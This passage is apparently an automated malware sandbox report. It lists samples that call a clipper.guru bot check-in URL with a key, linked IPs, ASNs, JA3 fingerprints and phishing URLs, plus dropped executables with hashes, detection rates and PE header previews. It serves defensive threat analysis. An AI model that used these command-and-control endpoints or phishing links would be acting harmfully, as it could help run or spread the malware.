	1D9DD4AE9D1BA20DBF36549110C16150525122F3AA7FD.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=123716&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	CE349E565197AA1AFAF25F21B5CDBB80880B96B34800F.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=134349&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	1A292CC8DA0DBDC4608018679F60E2EEB070C06374FDD.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=226546&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=210979&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=358075&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	10C8242C6A5D98F805DBAFC6F19E4673067010F967CC5.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=992547&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	RM1Qrb7RzL.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=675052&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	1D1BCE6C4A6CDB2B2DB0AA80629110DB005A108D02127.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=701188&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	FE6AC02E4C9283F8E678E7F0409F49C03234E9A4D72C5.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=580913&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
clipper.guru	AQjjTzMuUR.exe	Get hash	malicious	Browse	45.159.189.115
	AJ46HzaAxk.exe	Get hash	malicious	Browse	45.159.189.115
	Installer.exe	Get hash	malicious	Browse	45.159.189.115
	file.exe	Get hash	malicious	Browse	45.159.189.115
	KIDDIONS Menu.exe	Get hash	malicious	Browse	45.159.189.115
	ndkqXR67bn.exe	Get hash	malicious	Browse	45.159.189.115
	wrUTQGEVDe.exe	Get hash	malicious	Browse	45.159.189.115
	kKniUlCxJc.exe	Get hash	malicious	Browse	45.159.189.115
	IVO2cpEukR.exe	Get hash	malicious	Browse	45.159.189.115
	UQXEEX5Knp.exe	Get hash	malicious	Browse	45.159.189.115
	a7sbIsZgQU.exe	Get hash	malicious	Browse	45.159.189.115
	v5Glq26Uby.exe	Get hash	malicious	Browse	45.159.189.115
	NJD5jNzN1k.exe	Get hash	malicious	Browse	45.159.189.115
	9x5WDCFiR3.exe	Get hash	malicious	Browse	45.159.189.115
	YQ1u1r2mGC.exe	Get hash	malicious	Browse	45.159.189.115
	vPMLS1HVsL.exe	Get hash	malicious	Browse	45.159.189.115
	F9JyRaGSFC.exe	Get hash	malicious	Browse	45.159.189.115
	4EDB9CEDA2B49B682D3E30C4925610F81FFCC7D2B46A2.exe	Get hash	malicious	Browse	45.159.189.115
	47lBopdvBQ.exe	Get hash	malicious	Browse	45.159.189.115
	1D9DD4AE9D1BA20DBF36549110C16150525122F3AA7FD.exe	Get hash	malicious	Browse	45.159.189.115

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTING-SOLUTIONSUS	AQjjTzMuUR.exe	Get hash	malicious	Browse	45.159.189.115
	AJ46HzaAxk.exe	Get hash	malicious	Browse	185.223.93.133
	Installer.exe	Get hash	malicious	Browse	185.223.93.133
	file.exe	Get hash	malicious	Browse	45.159.189.115
	KIDDIONS Menu.exe	Get hash	malicious	Browse	45.159.189.115
	ndkqXR67bn.exe	Get hash	malicious	Browse	45.159.189.115
	wrUTQGEVDe.exe	Get hash	malicious	Browse	45.159.189.115
	https://exprxz.top/?qigr&qrc=pev@sampension.dk	Get hash	malicious	Browse	104.193.255.67
	kKniUlCxJc.exe	Get hash	malicious	Browse	45.159.189.115
	https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9maWxkb3Aub25lP2U9YnJvZ2Vyc0Bjb21mb3J0ZWNoLmNvbQ==	Get hash	malicious	Browse	162.248.225.249
	IVO2cpEukR.exe	Get hash	malicious	Browse	45.159.189.115
	UQXEEX5Knp.exe	Get hash	malicious	Browse	45.159.189.115
	file.exe	Get hash	malicious	Browse	185.180.199.136
	9x5WDCFiR3.exe	Get hash	malicious	Browse	45.159.189.115
	F9JyRaGSFC.exe	Get hash	malicious	Browse	45.159.189.115
	setup7.exe	Get hash	malicious	Browse	185.209.160.99
	IF($PSVeRSionTaBle.PSVeRsiOn.MAJOr -GE 3.ps1	Get hash	malicious	Browse	162.244.32.220
	Schadcode_20221026.ps1	Get hash	malicious	Browse	162.244.32.220
	4EDB9CEDA2B49B682D3E30C4925610F81FFCC7D2B46A2.exe	Get hash	malicious	Browse	45.159.189.115
	47lBopdvBQ.exe	Get hash	malicious	Browse	45.159.189.115

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	8109674.exe	Get hash	malicious	Browse	35.213.155.151
	03-11-22 SENAL TRACTORA FIRMA 04-11-22.pdf.exe	Get hash	malicious	Browse	35.213.155.151
	file.exe	Get hash	malicious	Browse	35.213.155.151
	obizx.exe	Get hash	malicious	Browse	35.213.155.151
	STATEMENT OF ACCOUNT OCTOBER 2022.exe	Get hash	malicious	Browse	35.213.155.151
	file.exe	Get hash	malicious	Browse	35.213.155.151
	AQjjTzMuUR.exe	Get hash	malicious	Browse	35.213.155.151
	New Kiddions.exe	Get hash	malicious	Browse	35.213.155.151
	AJ46HzaAxk.exe	Get hash	malicious	Browse	35.213.155.151
	Installer.exe	Get hash	malicious	Browse	35.213.155.151
	file.exe	Get hash	malicious	Browse	35.213.155.151
	file.exe	Get hash	malicious	Browse	35.213.155.151
	RFQ#11072022.IMG	Get hash	malicious	Browse	35.213.155.151
	SecuriteInfo.com.Heur.MSIL.Bladabindi.1.17686.11572.exe	Get hash	malicious	Browse	35.213.155.151
	SecuriteInfo.com.Trojan.Heur.IEC.908d4036d15.6739.13798.exe	Get hash	malicious	Browse	35.213.155.151
	Document Payment.js	Get hash	malicious	Browse	35.213.155.151
	MS-DGP-220137.js	Get hash	malicious	Browse	35.213.155.151
	SecuriteInfo.com.Win32.PWSX-gen.9443.8955.exe	Get hash	malicious	Browse	35.213.155.151
	ndkqXR67bn.exe	Get hash	malicious	Browse	35.213.155.151
	RFQ.exe	Get hash	malicious	Browse	35.213.155.151

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files\Google\Chrome\updater.exe	AJ46HzaAxk.exe	Get hash	malicious	Browse
	Installer.exe	Get hash	malicious	Browse
	ndkqXR67bn.exe	Get hash	malicious	Browse
	NCVVe1Xqfs.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\brave.exe	AQjjTzMuUR.exe	Get hash	malicious	Browse
	AJ46HzaAxk.exe	Get hash	malicious	Browse
	Installer.exe	Get hash	malicious	Browse
	ndkqXR67bn.exe	Get hash	malicious	Browse
	NCVVe1Xqfs.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\brave.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2884609
Entropy (8bit):	7.915812566955318
Encrypted:	false
SSDEEP:	49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
MD5:	EB27BB8CFA99D659E4FE023E9002ECD1
SHA1:	C783400302FDFAE0518269C5A5A8D4BAD29F42A3
SHA-256:	9C01D90543458567C4737731EE6754CC209E4BB78FF648EB75C4D23BE261EF2F
SHA-512:	AB5AD3C094ED1F094AA82D80D298E6D0AB15A94B58B007DBE8A6219FE8498569B5D9013D770BD9910F177F94F2639D84650655E8F60113051E98B386C49C36A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 81%
Joe Sandbox View:	Filename: AJ46HzaAxk.exe, Detection: malicious, Browse Filename: Installer.exe, Detection: malicious, Browse Filename: ndkqXR67bn.exe, Detection: malicious, Browse Filename: NCVVe1Xqfs.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$......,................@..............................,.......,...`... .............................................. ,......`,.......+..8...........p,.............................`Z+.(....................$,.0............................text...x...........................`.P`.data.....'..0....'.................@.`..rdata..pP...0+..R....+.............@.`@.pdata...8....+..:...n+.............@.0@.xdata...1....+..2....+.............@.0@.bss..........,.......................`..idata....... ,.......+.............@.0..CRT....x....@,.......+.............@.@..tls.........P,.......+.............@.@..rsrc........`,.......+.............@.0..reloc.......p,.......,.............@.0B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2843
Entropy (8bit):	5.3371553026862095
Encrypted:	false
SSDEEP:	48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKAHKx1N:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxk
MD5:	E98C96B912A2252CD91954187BDADB83
SHA1:	5271B576C48E2232363D40C6B2A9B615888907EB
SHA-256:	12FCA7D4379818526A85AFE3E7022892728C7179E63EC35E329E995230E27D08
SHA-512:	B8FA3961B35F53E706804047C270D4A8AC8AC50F0F9B54715BCCAD910E69944BCD78824664A4AA308E6EA1198B65A22ECD4E6C103EF690B8A4FB8136C6C94C17
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	45177
Entropy (8bit):	5.072498410577891
Encrypted:	false
SSDEEP:	768:PkWNxV3IpNBQkj25h4iUxuaV7frRJv5FVvCxHBG75ard35n9QOdBQNWzktAHkaN2:PkAxV3CNBQkj25h4iUxuaV7flJnVv6HA
MD5:	79EA83B42F934BED47A1B30D85AB0999
SHA1:	D5AD1B90152F5C698A714FC8044C52571EFCD57B
SHA-256:	9DDA715941C069B34C2052F8902BD6FE9C4956DD2F9E8713F8AD72032BD9662B
SHA-512:	6BDD1F73F199EE5A8BC2EB6FF1B13197E1303B2548932F071EA67A657B5D0056605C5FFC3BAEC02AFDF29A5425BCFA003BA607041A462C2A851B59AF0999567C
Malicious:	false
Preview:	PSMODULECACHE.F..._.>....?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........_t.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\brave.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2884608
Entropy (8bit):	7.915813410181377
Encrypted:	false
SSDEEP:	49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
MD5:	9253ED091D81E076A3037E12AF3DC871
SHA1:	EC02829A25B3BF57AD061BBE54180D0C99C76981
SHA-256:	78E0A8309BC850037E12C2D72A5B0843DCD8B412A0A597C2A3DCBD44E9F3C859
SHA-512:	29FF2FD5F150D10B2D281A45DF5B44873192605DE8DC95278D6A7B5053370E4AC64A47100B13C63F3C048DF351A9B51F0B93AF7D922399A91508A50C152E8CF4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 85%
Joe Sandbox View:	Filename: AQjjTzMuUR.exe, Detection: malicious, Browse Filename: AJ46HzaAxk.exe, Detection: malicious, Browse Filename: Installer.exe, Detection: malicious, Browse Filename: ndkqXR67bn.exe, Detection: malicious, Browse Filename: NCVVe1Xqfs.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$......,................@..............................,.......,...`... .............................................. ,......`,.......+..8...........p,.............................`Z+.(....................$,.0............................text...x...........................`.P`.data.....'..0....'.................@.`..rdata..pP...0+..R....+.............@.`@.pdata...8....+..:...n+.............@.0@.xdata...1....+..2....+.............@.0@.bss..........,.......................`..idata....... ,.......+.............@.0..CRT....x....@,.......+.............@.@..tls.........P,.......+.............@.@..rsrc........`,.......+.............@.0..reloc.......p,.......,.............@.0B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\ofg.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5021696
Entropy (8bit):	5.993044648550717
Encrypted:	false
SSDEEP:	49152:tAM3CiGxBRJHy51FmJgBaShRgd5MYh43VvATtg0IEqYjla27VdS5g+A:aMLGxBk1FmJgX2l4lv3EdZv+A
MD5:	CD4AC234EE1C9FCA552D11FF31B9C5CC
SHA1:	E3448C185BDF0E0A0859F2B28D1B5F28C38A0064
SHA-256:	FC8DB07536652808292DDCA99645F2E64431BAF7F72BA1A8D358229E16FAFBD8
SHA-512:	D07048D1359350C9913D2727CB40969383EACA0593B7395D2C51435E0DEFAA91F4C95F038BB1877847D520EFA0150359860036F6E6E1C3E2ECE24BC4FF8C6B9F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 65% Antivirus: Metadefender, Detection: 20%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........L.......".......&...................@..............................`P...........`... ...............................................N...............................N..f.................................................. @G.H............................text.....&.......&.................`..`.rdata... ...&... ...&.............@..@.data........@G......,G.............@....idata........N......0K.............@....reloc...f....N..h...6K.............@..B.symtab......PP.......L................B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\setup.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	6231483
Entropy (8bit):	7.9984118189088065
Encrypted:	true
SSDEEP:	98304:UJlQcZOWdS58SUxTzskoHi3a7UpYLzwnGuqfkIF8RK2qBHNp6mgC6ZwECQ0em5v8:UJltOuS54xTzs5XTLFBfkJ42qBtpJ2wU
MD5:	96CBBD2930425374E0D2D6E251BE9834
SHA1:	7870A26F33469C4CEF96CECD4E0B20C82FA4E1AF
SHA-256:	55AF8940100B432C2873C1B4EC0068516EC9459AE313FD1D3AC2957EF7ABE033
SHA-512:	0753D1B927B76B8765AE7657F5CB339EB861C2C6F567DD40CB51DC17F76287EA061236723278A6C06FC29D6452243E12213CCFBD3236D4709719A0104554B0A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@..........................p............@..........................................`..`............................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...`....`......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3A08.tmp

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\brave.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	335360
Entropy (8bit):	7.548086611496671
Encrypted:	false
SSDEEP:	6144:RBx7z3Bre16M01nguKBmmlbvx0zKGkl5EiCtuhNjtANJ4tDWhRaitlopYR:RnBreIfKNJVZotuhNZKxrYpI
MD5:	DA87A0A2ABA605908BF8B9A3F4377481
SHA1:	5CAC4EA0B3F0CC2D7C04655DB12AD0443CBAA5CF
SHA-256:	22EE7B8104599B47313195598FFC34AAFD6A6552DCCE0E7B3232CED3A90AC9A4
SHA-512:	55A8A27A013CB2C3DEDA81779D89AB956A5F57D00A155496ABC7BF3C5A87F3B7C41058AB3681CBBD0406F69EA01C4FFC3E5779C2CA676088A68CB87F19C34C28
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81% Antivirus: Metadefender, Detection: 32%, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$..........;..eh..eh..eh.fi..eh.`iS.eh..`i..eh..ai..eh..fi..eh.ai..eh.di..eh..dhE.eh^.li..eh^..h..eh...h..eh^.gi..ehRich..eh........PE..d......b.........."..........n......D..........@.............................`............`..................................................e..P...............(............P..d....Q..p............................P..@...............x............................text...0........................... ..`.rdata.............................@..@.data...X....p.......`..............@....pdata..(............l..............@..@_RDATA..\............\|..............@..@.rsrc................~..............@..@.reloc..d....P......................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_035ejq30.2kl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hknxkl3.adj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5parqzvs.iu3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb0iqjgi.nip.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpteaeqj.ka2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzqmkcba.d5n.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tosfoqt4.feb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5wwk4ga.ryc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\nsd7E6A.tmp\nsExec.dll

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\setup.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	7168
Entropy (8bit):	5.298362543684714
Encrypted:	false
SSDEEP:	96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
MD5:	675C4948E1EFC929EDCABFE67148EDDD
SHA1:	F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
SHA-256:	1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
SHA-512:	61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\ofg.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5021696
Entropy (8bit):	5.993044648550717
Encrypted:	false
SSDEEP:	49152:tAM3CiGxBRJHy51FmJgBaShRgd5MYh43VvATtg0IEqYjla27VdS5g+A:aMLGxBk1FmJgX2l4lv3EdZv+A
MD5:	CD4AC234EE1C9FCA552D11FF31B9C5CC
SHA1:	E3448C185BDF0E0A0859F2B28D1B5F28C38A0064
SHA-256:	FC8DB07536652808292DDCA99645F2E64431BAF7F72BA1A8D358229E16FAFBD8
SHA-512:	D07048D1359350C9913D2727CB40969383EACA0593B7395D2C51435E0DEFAA91F4C95F038BB1877847D520EFA0150359860036F6E6E1C3E2ECE24BC4FF8C6B9F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 65% Antivirus: Metadefender, Detection: 20%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........L.......".......&...................@..............................`P...........`... ...............................................N...............................N..f.................................................. @G.H............................text.....&.......&.................`..`.rdata... ...&... ...&.............@..@.data........@G......,G.............@....idata........N......0K.............@....reloc...f....N..h...6K.............@..B.symtab......PP.......L................B................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	17904
Entropy (8bit):	5.440180228785624
Encrypted:	false
